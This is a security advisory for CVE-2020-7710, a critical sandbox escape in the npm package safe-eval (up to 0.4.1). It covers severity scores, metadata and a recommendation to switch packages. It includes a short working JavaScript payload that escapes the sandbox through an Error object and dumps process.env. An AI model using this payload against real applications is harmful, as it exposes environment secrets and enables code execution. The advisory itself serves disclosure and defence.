CVE-2020-7710 – safe-eval

Package

Manager: npm
Name: safe-eval
Vulnerable Version: >=0 <=0.4.1

Severity

Level: Critical

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

EPSS: 0.00513 pctl0.65515

Details

Sandbox Breakout / Arbitrary Code Execution in safe-eval All versions of `safe-eval` are vulnerable to Sandbox Escape leading to Remote Code Execution. The package fails to restrict access to the main context through Error objects. This may allow attackers to execute arbitrary code in the system. Evaluating the payload ```js (function (){ var ex = new Error ex.__proto__ = null ex.stack = { match: x => { return x.constructor.constructor("throw process.env")() } } return ex })() ``` prints the contents of `process.env`. ## Recommendation No fix is currently available. Consider using an alternative package until a fix is made available.

Metadata

Created: 2020-08-25T23:40:53Z
Modified: 2023-09-11T23:01:24Z
Source: MANUAL
CWE IDs: ["CWE-94"]
Alternative ID: GHSA-hrpq-r399-whgw
Finding: F422
Auto approve: 1